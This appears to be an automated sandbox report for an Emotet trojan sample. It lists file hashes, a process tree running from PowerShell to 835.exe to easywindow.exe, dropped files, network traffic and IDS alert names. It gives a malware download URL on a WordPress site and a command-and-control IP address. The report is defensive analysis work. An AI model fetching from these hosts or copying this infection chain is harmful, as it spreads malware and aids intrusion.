Field | Value
---|---
File name | f8ee5044ff1c81384ecdd4735d5f8d0d93bee834.zip
Full analysis | https://app.any.run/tasks/8b1618ba-489a-4048-93d7-a85e26adafd1
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into highly destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.
Analysis date | September 19, 2019, 06:23:36
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | application/zip
File info | Zip archive data, at least v2.0 to extract
MD5 | 70DCDBE1E0186FBE98375B72FAC5C5AD
SHA1 | 695F67AB37C34F3D539517846EF5F1E01B4874BB
SHA256 | 58CD281561DAB7638621EBDBF67D0A88CED6D8186201847FEE88B30E768FCA3E
SSDEEP | 3072:HQTXsCiaXMT+rF3xrUc5uQJCFgIdhZFo2B8wDT1:bnAc+B3x5w+oLy2BZDp
.zip | ZIP compressed archive (100)
---|---
ZipFileName | f8ee5044ff1c81384ecdd4735d5f8d0d93bee834
ZipUncompressedSize | 328128
ZipCompressedSize | 168522
ZipCRC | 0x0164785e
ZipModifyDate | 2019:09:18 18:48:15
ZipCompression | Deflated
ZipBitFlag | 0x0009
ZipRequiredVersion | 20
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2892 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encod 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3452 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2604 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | 835.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2708 | --f0e46278 | C:\Users\admin\835.exe | — | 835.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
3440 | --f0e46278 | C:\Users\admin\835.exe | | 835.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2556 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 835.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
3512 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
3636 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2268 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | | easywindow.exe | User: admin; Integrity Level: MEDIUM
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QXJIBZ77IARUGLCT3ZC.temp | — | — | —
2556 | easywindow.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | 4D1A1DE1F2B1D264377A7A5C5B40B844 | F26D8DCEC42E57D0B73D55E706ACDC4416C10F72BEC476F3D48E753C39989436
2708 | 835.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | 80C79B5C354D342D79298E49F62025BE | 67EB090BCDBDD2E3EBAC1A3CF5C510218916E4AB644DEE242EFA22769D22AE92
2892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF168d21.TMP | binary | 0F2CAD9746414ABA31294C3B560FCFD5 | 19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
2892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 0F2CAD9746414ABA31294C3B560FCFD5 | 19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
3452 | 835.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | 031903DCFA946BE52040BE42264FB509 | FA33DEB2CFEA562C014EA409DBB164B40EA10B55717FF59A8E9070521F05A37C
3636 | easywindow.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | 4D1A1DE1F2B1D264377A7A5C5B40B844 | F26D8DCEC42E57D0B73D55E706ACDC4416C10F72BEC476F3D48E753C39989436
2892 | powershell.exe | C:\Users\admin\835.exe | executable | BF2A3BBE79924E52BE9E18824C1E1550 | 23BB7590D1F79E552182BF686882D05F31035B76BE173B24308EA374BDEAF58D
3440 | 835.exe | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | executable | BF2A3BBE79924E52BE9E18824C1E1550 | 23BB7590D1F79E552182BF686882D05F31035B76BE173B24308EA374BDEAF58D
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2892 | powershell.exe | GET | 200 | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | executable | 512 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2892 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
2268 | easywindow.exe | 114.79.134.129:443 | — | D-Vois Broadband Pvt Ltd | IN | malicious |
Domain | IP | Reputation
---|---|---
thinhvuongmedia.com | | suspicious
PID | Process | Class | Message |
---|---|---|---|
2892 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2892 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2892 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2892 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2268 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
2268 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2268 | easywindow.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |